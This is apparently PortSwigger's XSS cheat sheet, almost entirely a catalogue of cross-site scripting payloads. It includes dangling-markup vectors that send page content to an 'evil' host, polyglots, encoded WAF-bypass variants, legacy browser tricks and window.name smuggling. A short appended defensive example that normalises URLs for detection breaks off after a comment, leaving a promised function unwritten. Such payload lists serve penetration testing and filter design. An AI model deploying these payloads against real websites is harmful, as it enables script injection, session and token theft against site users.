Img to pass markup through src attribute: <img src="//evil? <image src="//evil?

Video using track element: <video><track default src="//evil?

Video using source element and src attribute: <video><source src="//evil?

Audio using source element and src attribute: <audio><source src="//evil?

Input src: <input type=image src="//evil?

Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction: <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Form using action: <button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data: <object data="//evil?

Iframe src: <iframe src="//evil?

Embed src: <embed src="//evil?

Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil/ target='

Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss</a><base href="//evil/

Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string, string concatenation (window): window["ale"+"rt"](window["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (self): self["ale"+"rt"](self["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (this): this["ale"+"rt"](this["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (top): top["ale"+"rt"](top["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (parent): parent["ale"+"rt"](parent["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (frames): frames["ale"+"rt"](frames["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, string concatenation (globalThis): globalThis["ale"+"rt"](globalThis["doc"+"ument"]["dom"+"ain"])

XSS into a JavaScript string, comment syntax (window): window[/*foo*/"alert"/*bar*/](window[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (self): self[/*foo*/"alert"/*bar*/](self[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (this): this[/*foo*/"alert"/*bar*/](this[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (top): top[/*foo*/"alert"/*bar*/](top[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (parent): parent[/*foo*/"alert"/*bar*/](parent[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (frames): frames[/*foo*/"alert"/*bar*/](frames[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, comment syntax (globalThis): globalThis[/*foo*/"alert"/*bar*/](globalThis[/*foo*/"document"/*bar*/]["domain"])

XSS into a JavaScript string, hex escape sequence (window): window["\x61\x6c\x65\x72\x74"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (self): self["\x61\x6c\x65\x72\x74"](self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (this): this["\x61\x6c\x65\x72\x74"](this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (top): top["\x61\x6c\x65\x72\x74"](top["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (parent): parent["\x61\x6c\x65\x72\x74"](parent["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (frames): frames["\x61\x6c\x65\x72\x74"](frames["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence (globalThis): globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])

XSS into a JavaScript string, hex escape sequence and base64 encoded string (window): window["\x65\x76\x61\x6c"](window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (self): self["\x65\x76\x61\x6c"](self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (this): this["\x65\x76\x61\x6c"](this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (top): top["\x65\x76\x61\x6c"](top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent): parent["\x65\x76\x61\x6c"](parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames): frames["\x65\x76\x61\x6c"](frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis): globalThis["\x65\x76\x61\x6c"](globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT")))

XSS into a JavaScript string, octal escape sequence (window): window["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (self): self["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (this): this["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (top): top["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (parent): parent["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (frames): frames["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, octal escape sequence (globalThis): globalThis["\141\154\145\162\164"]("\130\123\123")

XSS into a JavaScript string, unicode escape (window): window["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (self): self["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (this): this["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (top): top["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (parent): parent["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (frames): frames["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, unicode escape (globalThis): globalThis["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")

XSS into a JavaScript string, RegExp source property (window): window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (self): self[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (this): this[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (top): top[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (parent): parent[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (frames): frames[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (globalThis): globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (window): window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (self): self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (this): this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (top): top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (parent): parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (frames): frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis): globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

Impossible labs

Columns: title, description, length limit, closest vector, link

Basic context, WAF blocks <[a-zA-Z]
This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A. 🔗

Script based injection but quotes, forward slash and backslash are escaped
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block.
The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A. Closest vector: N/A. 🔗

innerHTML context but no equals allowed
You have a site that processes the query string and URL decodes the parameters, but splits on the equals then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A. 🔗

Basic context, length limit
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters: <q/oncut=alert``, but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``. 🔗

Attribute context, length limit
The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: "oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: "oncut=alert`` (with trailing space). 🔗

Basic context, length limit, arbitrary code
It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q/oncut=eval(name). 🔗

Attribute context, length limit, arbitrary code
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see link. 🔗

Injection occurs inside a frameset but before the body
We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A. 🔗

Injection occurs inside a single quoted string, only characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A. 🔗

Classic vectors (XSS crypt)

Image src with JavaScript protocol: <img src="javascript:alert(1)">

Body background with JavaScript protocol: <body background="javascript:alert(1)">

Iframe data URLs no longer work as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE
<a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language="vbs" onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE
<a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>

JScript.Encode allows encoded JavaScript
<a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encode allows encoded VBScript
<iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language="VBScript.Encode" onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">

JavaScript entities used to work in Netscape Navigator
<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator
<link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup: <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox only <= 2
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data URLs
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%2210%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)">

CSS expressions, <= IE7
<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))> <div style="color&#x3dred">test</div>

Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions
<script> function window.onload() { alert(1); } </script>
<script> function window::onload() { alert(1); } </script>
<script> function window.location() {} </script>
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() {} </script> </body>
<body> <script> function document.body.innerHTML() { x = '<img src=1 onerror=alert(1)>'; } </script> </body>

GreyMagic HTML+TIME exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &: <a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities: <a href="javascript:&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments
<!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>

Isindex using src attribute: <isindex type=image src="//evil?

Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Isindex and formaction: <isindex type=submit formaction="javascript:alert(1)">

Isindex and action: <isindex type=submit action="javascript:alert(1)">

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.


No parentheses using exception handling and eval on Firefox
<script>onerror=eval;throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses using ES6 hasInstance and instanceof with eval without
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses using location redirect: <script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect, no strings: <script>location=name</script>

No parentheses using template strings: <script>alert`1`</script>

No parentheses using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}```</script>

Frameworks

Bootstrap onanimationstart event: <xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event
<xss class="carousel slide" data-ride="carousel" data-interval=100 ontransitionend=alert(1)><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>

Protocols

Iframe src attribute, JavaScript protocol: <iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol: <object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol: <embed src="javascript:alert(1)">

A standard JavaScript protocol: <a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive: <a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol: <a href=" javascript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed inside the protocol (a tab is shown here)
<a href="javas	cript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon (a tab is shown here)
<a href="javascript	:alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src: <script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag: <svg><script href="data:text/javascript,alert(1)" />

SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL: <script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable: <math><x href="javascript:alert(1)">blah

Button and formaction: <form><button formaction=javascript:alert(1)>XSS

Input and formaction: <form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action: <form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL: <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

Other useful attributes

Using srcdoc attribute: <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities: <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: access key attributes can enable XSS on normally unexploitable elements
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)

Link elements: access key attributes can enable XSS on normally unexploitable elements
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage
<a href="#" download="filename.html">Test</a>

Disable referrer using referrerpolicy: <img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open function
<a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>

Set window.name via name attribute in an <iframe> tag
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>

Set window.name via target attribute in a <base> tag
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>

Set window.name via target attribute in an <a> tag
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>

Set window.name via usemap attribute in an <img> tag
<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>

Set window.name via target attribute in a <form> tag
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>

Set window.name via formtarget attribute in an <input> tag, type submit
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>

Set window.name via formtarget attribute in an <input> tag, type image
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Special tags

Redirect to a different domain: <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute, UTF-7: <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7: <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 1: +/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 2: +/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 3: +/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 4: +/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests: <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox: <iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referrer: <meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>

Unicode escapes: <script>\u0061lert(1)</script>

Unicode escapes, ES6 style: <script>\u{61}lert(1)</script>

Unicode escapes, ES6 style, zero padded: <script>\u{0000000061}lert(1)</script>

Hex encoding, JavaScript escapes: <script>eval('\x61lert(1)')</script>

Octal encoding: <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>

Decimal encoding with optional semi-colon: <a href="&#106;avascript:alert(1)">XSS</a> <a href="&#106avascript:alert(1)">XSS</a>

SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros: <a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities: <a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semi-colon, provided the next character is not a-f0-9 (a tab is shown after the reference)
<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a	avascript:alert(1)">XSS</a>

Hex encoding with padded zeros: <a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive: <a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities
<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding: <a href="javascript:x='%27-alert(1)-%27'">XSS</a>

HTML entities and URL encoding: <a href="javascript:x='&percnt;27-alert(1)-&percnt;27'">XSS</a>
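The Protocols and Encoding sections above list the parsing rules that let these vectors slip past a filter that inspects the raw attribute text: character references in decimal or hex, with or without a semicolon, with padded zeros and in either case; named references such as &colon;, &Tab; and &NewLine;; a scheme that is case-insensitive, may be preceded by \x01-\x20 and may contain \x09, \x0a or \x0d; and percent-encoding inside the javascript: body. The following is an added example, not code from the cheat sheet, showing how a detection rule or output filter can normalise a URL attribute through those same layers so that it compares what the browser will actually act on. The named-reference table is a deliberately small subset chosen to cover the vectors on this page, and all sample inputs are constructed from them.

```javascript
// Added example (not from the PortSwigger cheat sheet): normalise a URL
// attribute the way the browser does before checking its scheme.

// Subset of HTML named character references used by the vectors above.
// A full parser knows ~2200 names; this table is illustrative only.
const NAMED_REFS = {
  colon: ":", Tab: "\t", NewLine: "\n", lpar: "(", rpar: ")",
  quot: "\"", percnt: "%", sol: "/", lt: "<", gt: ">", amp: "&", semi: ";",
};

// Resolve character references as the HTML tokenizer does:
//   &#106;  &#0000106;  &#106 (no semicolon, next char not a digit) -> "j"
//   &#x6a;  &#X6A;  &#x0000006a; &#x6a (no semicolon, next char not hex) -> "j"
//   &colon; &Tab; &NewLine; &lpar; ... -> the named character
// Numeric references are greedy: "&#x6aavascript" swallows the "a" as a hex
// digit, which is exactly the "next character is not a-f0-9" condition above.
// Unknown names are left untouched, as the parser leaves them.
function decodeHtmlEntities(value) {
  return value.replace(
    /&(#[xX][0-9a-fA-F]+|#[0-9]+|[A-Za-z][A-Za-z0-9]*);?/g,
    (whole, body) => {
      if (body[0] === "#") {
        const hex = body[1] === "x" || body[1] === "X";
        const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
        return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
      }
      return Object.prototype.hasOwnProperty.call(NAMED_REFS, body)
        ? NAMED_REFS[body]
        : whole;
    }
  );
}

// URL parser pre-processing: leading \x01-\x20 are ignored and \x09 \x0a \x0d
// are removed everywhere, so "java\tscript" and "javascript\n:" both resolve
// to the javascript scheme.
function cleanUrl(url) {
  return url.replace(/^[\x01-\x20]+/, "").replace(/[\t\n\r]/g, "");
}

// The scheme the browser will see, lower-cased ("JaVaScript" -> "javascript"),
// or null when the value has no scheme (relative URL).
function effectiveScheme(url) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(cleanUrl(url));
  return m ? m[1].toLowerCase() : null;
}

// Predicate for a filter or detection rule: decode entities first, then
// normalise the URL, then compare the scheme.
function isJavascriptUrl(rawAttribute) {
  return effectiveScheme(decodeHtmlEntities(rawAttribute)) === "javascript";
}

// For a javascript: URL, the code the browser would execute: the text after
// the colon with percent-encoding resolved (this is how "%27" and
// "&percnt;27" in the vectors above become a quote). Null for other schemes;
// a malformed percent sequence falls back to the raw body instead of throwing.
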